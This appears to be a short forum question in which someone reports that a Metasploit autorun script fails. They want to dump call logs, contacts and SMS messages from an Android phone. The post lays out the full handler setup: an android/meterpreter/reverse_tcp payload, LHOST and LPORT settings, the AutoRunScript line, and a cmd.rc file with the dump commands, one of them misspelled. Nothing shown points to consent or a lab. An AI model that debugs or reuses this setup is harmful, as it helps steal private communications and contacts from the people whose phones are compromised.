I can not run the autorun script in my terminal. I want to dump call, message, and contact from android.
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST ip
set LPORT 444
set AutoRunScript multi_console_command -rc cmd.rc
exploit -j -z
in cmd.rc file I wrote these line
dump_calllog
dump_cantacts
dump_sms
but its not works.